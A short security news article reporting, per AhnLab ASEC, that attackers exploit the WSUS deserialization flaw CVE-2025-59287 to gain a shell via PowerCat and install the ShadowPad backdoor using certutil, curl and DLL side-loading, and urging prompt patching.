A recently discovered security vulnerability in Microsoft Windows Server Update Services (WSUS) is being actively exploited by threat actors to distribute the ShadowPad malware. According to the AhnLab Security Intelligence Center (ASEC), attackers are leveraging CVE-2025-59287 to gain initial access to systems with WSUS enabled.
The attack methodology involves using PowerCat, a PowerShell-based utility, to obtain a system shell after exploiting the vulnerability. Once access is gained, the attackers download and install the ShadowPad malware using command line tools like certutil and curl. ShadowPad, first identified in 2015, is a modular backdoor frequently associated with Chinese state-sponsored operations, and it has been described as a significant tool in the realm of espionage.
Microsoft previously issued a patch for CVE-2025-59287, which pertains to a critical deserialization flaw enabling remote code execution with system privileges. Post-patch, the vulnerability has faced rapid exploitation, allowing malicious actors to target publicly exposed WSUS instances. This leads not only to the execution of malicious code but also facilitates the deployment of legitimate tools for further reconnaissance and exploitation.
The exploit enables attackers to run legitimate system utilities, such as "curl.exe" and "certutil.exe," to connect to external servers and download the ShadowPad malware. The installation process often utilizes a technique called DLL side-loading, whereby a legitimate application is manipulated to execute malicious code masquerading as a normal operation.
Once installed, ShadowPad has the capability to load various plugins and utilizes anti-detection mechanisms to maintain persistence within compromised systems. The rapid exploitation of this vulnerability highlights the critical nature of timely patching and the need for enhanced security measures to defend against such vulnerabilities, especially given its potential for widespread impact.
AhnLab also noted that the vulnerability’s exploitation is particularly severe because it permits remote code execution with elevated permissions, drastically increasing the attack surface for affected organizations.